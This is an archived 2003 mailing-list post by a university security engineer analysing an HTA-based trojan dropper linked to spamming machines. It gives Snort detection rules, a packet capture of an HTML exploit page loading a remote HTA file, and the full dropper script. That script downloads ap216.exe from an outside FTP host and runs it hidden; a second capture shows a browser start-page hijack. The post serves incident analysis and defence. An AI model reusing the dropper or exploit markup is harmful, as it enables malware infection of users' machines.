[unisog] Spamming machines: a mystery dll?

Gary Flynn flynngn at jmu.edu
Fri Sep 26 15:45:17 GMT 2003


This may be useful:
http://www.lurhq.com/autoproxy.html

Also, if you have Snort or another IDS/packet capture device
at your border, you may want to watch for application/hta:

alert tcp any 80 -> any any (msg:"HTA MIME Content in HTML";content:"Content-Type\:";nocase;content:"application/hta";nocase;)
alert tcp any any -> any 25 (msg:"HTA MIME Content in SMTP";content:"Content-Type\:";nocase;content:"application/hta";nocase;)

and then follow up on the sessions.

Sample:

****************************************************************
Snort capture
****************************************************************

34 0D 0A 0D 0A 3C 68 74 6D 6C 3E 3C 62 6F 64 79  4....<html><body
3E 0D 0A 3C 73 70 61 6E 20 64 61 74 61 73 72 63  >..<span datasrc
3D 22 23 6F 45 78 65 63 22 20 64 61 74 61 66 6C  ="#oExec" datafl
64 3D 22 65 78 70 6C 6F 69 74 22 20 64 61 74 61  d="exploit" data
66 6F 72 6D 61 74 61 73 3D 22 68 74 6D 6C 22 3E  formatas="html">
3C 2F 73 70 61 6E 3E 0D 0A 3C 78 6D 6C 20 69 64  </span>..<xml id
3D 22 6F 45 78 65 63 22 3E 0D 0A 3C 73 65 63 75  ="oExec">..<secu
72 69 74 79 3E 0D 0A 3C 65 78 70 6C 6F 69 74 3E  rity>..<exploit>
0D 0A 3C 21 5B 43 44 41 54 41 5B 0D 0A 3C 6F 62  ..<![CDATA[..<ob
6A 65 63 74 20 64 61 74 61 3D 68 74 74 70 3A 2F  ject data=http:/
2F 77 76 77 2E 62 65 65 63 68 2D 69 6E 66 6F 32  /wvw.beech-info2
2E 63 6F 6D 2F 5F 76 74 69 5F 63 6F 6E 2F 69 6E  .com/_vti_con/in
66 2E 6F 6F 6F 20 77 69 64 74 68 3D 30 20 68 65  f.ooo width=0 he
69 67 68 74 3D 30 3E 0D 0A 5D 5D 3E 0D 0A 3C 2F  ight=0>..]]>..</
65 78 70 6C 6F 69 74 3E 0D 0A 3C 2F 73 65 63 75  exploit>..</secu
72 69 74 79 3E 0D 0A 3C 2F 78 6D 6C 3E 0D 0A 3C  rity>..</xml>..<
2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E           /body></html>

*****************************************************************
inf.ooo file from referenced site:
*****************************************************************

<html>
<HTA:APPLICATION ID="hope"
APPLICATIONNAME="hopeInstaller"
BORDER="none"
CAPTION="no"
ICON=""
CONTEXTMENU="no"
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
SCROLL="no"
SHOWINTASKBAR="no"
SINGLEINSTANCE="no"
SELECTION="no"
INNERBORDER="no"
SYSMENU="no"
VERSION="1.0"
HEIGHT="1"
WIDTH="1"
WINDOWSTATE="normal"/>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
self.moveTo(3000,0);
self.blur();
fso = new ActiveXObject("Scripting.FileSystemObject");
WshSysEnv = wsh.Environment("Process");
t = WshSysEnv("windir");
if (!fso.FileExists(t+"\\sv.exe"))
{
if (!fso.FileExists(t+"\\ftp.txt"))
{
f = fso.CreateTextFile(t+"\\ftp.txt", true);
f.WriteLine("open wvw.beech-info2.com 53");
f.WriteLine("binary");
f.WriteLine("get ap216.exe "+t+"\\sv.exe");
f.WriteLine("quit");
f.Close();
wsh.Run("cmD.exe /q /t /c ftp -s:%windir%\\ftp.txt -A", intWindowStyle="0", bWaitOnReturn="TRUE");
wsh.Run("cmD.exe /q /t /c del %windir%\\ftp.txt /q",intWindowStyle="0");
wsh.Run("cmD.exe /q /t /c %windir%\\sv.exe",intWindowStyle="0");
}
}
</script>
</html>

*********************************************************

Note the FTP server wvw.beech-info2.com on port 53. I
was able to connect to it and login as anonymous but
I wasn't able to get a directory or download the ap216.exe
file which is mentioned at the site below as the autoproxy
trojan:

http://www.lurhq.com/autoproxy.html


References to passthison.com also seem to be well represented
in the captured traffic:

0A 0D 0A 31 63 65 0D 0A 3C 68 74 6D 6C 3E 0A 3C  ...1ce..<html>.<
6F 62 6A 65 63 74 20 69 64 3D 27 77 73 68 27 20  object id='wsh'
63 6C 61 73 73 69 64 3D 27 63 6C 73 69 64 3A 46  classid='clsid:F
39 33 35 44 43 32 32 2D 31 43 46 30 2D 31 31 44  935DC22-1CF0-11D
30 2D 41 44 42 39 2D 30 30 43 30 34 46 44 35 38  0-ADB9-00C04FD58
41 30 42 27 3E 3C 2F 6F 62 6A 65 63 74 3E 0A 3C  A0B'></object>.<
73 63 72 69 70 74 3E 0A 77 73 68 2E 52 65 67 57  script>.wsh.RegW
72 69 74 65 28 22 48 4B 43 55 5C 5C 53 6F 66 74  rite("HKCU\\Soft
77 61 72 65 5C 5C 4D 69 63 72 6F 73 6F 66 74 5C  ware\\Microsoft\
5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72  \Internet Explor
65 72 5C 5C 4D 61 69 6E 5C 5C 53 74 61 72 74 20  er\\Main\\Start
50 61 67 65 22 2C 20 22 68 74 74 70 3A 2F 2F 77  Page", "http://w
77 77 2E 70 61 73 73 74 68 69 73 6F 6E 2E 63 6F  ww.passthison.co
6D 2F 72 34 2F 3F 76 75 30 38 33 30 30 33 2D 66  m/r4/?vu083003-f
69 6E 61 6C 2D 64 65 73 74 69 6E 61 74 69 6F 6E  inal-destination
2D 72 65 64 69 72 65 63 74 2D 74 6F 2D 2D 2D 2D  -redirect-to----
2D 2D 2D 2D 2D 2D 2D 2D 68 74 74 70 3A 2F 2F 77  --------http://w
77 77 2E 6E 65 77 2D 64 65 66 61 75 6C 74 2D 68  ww.new-default-h
6F 6D 65 70 61 67 65 33 33 39 38 39 30 30 30 32  omepage339890002
32 32 38 33 33 33 39 33 33 39 38 39 30 30 30 32  2283339339890002
32 32 38 33 33 33 39 33 33 39 38 39 30 30 30 32  2283339339890002
32 32 38 33 33 33 39 33 33 39 38 39 30 30 30 32  2283339339890002
32 32 38 33 33 33 39 33 33 39 38 39 30 30 30 32  2283339339890002
32 32 38 33 33 33 39 33 33 39 38 39 30 30 30 32  2283339339890002
32 32 38 33 33 33 39 2E 6E 65 74 22 29 0A 3C 2F  2283339.net").</


BTW, has anyone disabled the HTA MIME type association in the
registry of a significant number of machines as suggested
by the CERT advisory?
http://www.kb.cert.org/vuls/id/865940

We're blocking application/hta at our mail server but
that doesn't do anything for the web threat.

-- 
Gary Flynn
Security Engineer - Technical Services
James Madison University

Please R.U.N.S.A.F.E.
http://www.jmu.edu/computing/runsafe



More information about the unisog mailing list